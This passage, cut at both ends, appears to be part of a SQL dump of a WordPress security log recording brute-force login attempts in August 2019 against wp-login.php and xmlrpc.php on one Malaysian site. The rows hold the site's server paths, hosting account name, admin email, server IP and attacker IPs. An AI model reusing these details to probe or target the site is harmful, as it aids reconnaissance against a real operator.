empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"62.68.194.3\";s:11:\"REMOTE_PORT\";s:5:\"45984\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN-M3xaD7qVX4VJuZ-fqwAAAAY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566801715.1291\";s:12:\"REQUEST_TIME\";s:10:\"1566801715\";}}','notice','2019-08-26 06:41:56','2019-08-26 06:41:55',17682256,19171784,'https://bintara.com.my/wp-login.php',1,0,'62.68.194.3'),(23073,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"62.68.194.3\";s:11:\"REMOTE_PORT\";s:5:\"47030\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN-NnxaD7qVX4VJuZ-frgAAABA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566801718.1154\";s:12:\"REQUEST_TIME\";s:10:\"1566801718\";}}','notice','2019-08-26 06:41:59','2019-08-26 06:41:58',18200752,19497736,'https://bintara.com.my/xmlrpc.php',1,0,'62.68.194.3'),(23074,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.211.155\";s:11:\"REMOTE_PORT\";s:5:\"42630\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN-8nxaD7qVX4VJuZ-gfAAAAAc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566801906.5212\";s:12:\"REQUEST_TIME\";s:10:\"1566801906\";}}','notice','2019-08-26 06:45:08','2019-08-26 06:45:07',17689224,19174752,'https://bintara.com.my/wp-login.php',1,0,'162.241.211.155'),(23075,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.211.155\";s:11:\"REMOTE_PORT\";s:5:\"42630\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN-8nxaD7qVX4VJuZ-gfAAAAAc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566801906.5212\";s:12:\"REQUEST_TIME\";s:10:\"1566801906\";}}','notice','2019-08-26 06:45:08','2019-08-26 06:45:07',17852208,19174752,'https://bintara.com.my/wp-login.php',1,0,'162.241.211.155'),(23076,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"173.237.172.98\";s:11:\"REMOTE_PORT\";s:5:\"56050\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN-9LLuw7edOKpgf7B3WgAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566801908.3431\";s:12:\"REQUEST_TIME\";s:10:\"1566801908\";}}','notice','2019-08-26 06:45:10','2019-08-26 06:45:08',17682840,19172624,'https://bintara.com.my/wp-login.php',1,0,'173.237.172.98'),(23077,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.211.155\";s:11:\"REMOTE_PORT\";s:5:\"43164\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN-97Luw7edOKpgf7B3XAAAAIo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566801911.2023\";s:12:\"REQUEST_TIME\";s:10:\"1566801911\";}}','notice','2019-08-26 06:45:13','2019-08-26 06:45:11',18200248,19497104,'https://bintara.com.my/xmlrpc.php',1,0,'162.241.211.155'),(23078,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"65.99.237.14\";s:11:\"REMOTE_PORT\";s:5:\"31450\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOBwXxaD7qVX4VJuZ-iIwAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566802369.7007\";s:12:\"REQUEST_TIME\";s:10:\"1566802369\";}}','notice','2019-08-26 06:52:51','2019-08-26 06:52:50',17685504,19177640,'https://bintara.com.my/wp-login.php',1,0,'65.99.237.14'),(23079,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"115.74.227.62\";s:11:\"REMOTE_PORT\";s:5:\"58140\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOBynxaD7qVX4VJuZ-iKAAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566802378.9163\";s:12:\"REQUEST_TIME\";s:10:\"1566802378\";}}','notice','2019-08-26 06:53:00','2019-08-26 06:52:59',17685584,19177176,'https://bintara.com.my/wp-login.php',1,0,'115.74.227.62'),(23080,0,'brute_force','invalid-login::username-haiduongford','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:12:\"haiduongford\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"480\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"115.74.227.62\";s:11:\"REMOTE_PORT\";s:5:\"58520\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOBzXxaD7qVX4VJuZ-iKQAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566802381.4624\";s:12:\"REQUEST_TIME\";s:10:\"1566802381\";}}','notice','2019-08-26 06:53:03','2019-08-26 06:53:02',18199408,19497976,'https://bintara.com.my/xmlrpc.php',1,0,'115.74.227.62'),(23081,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 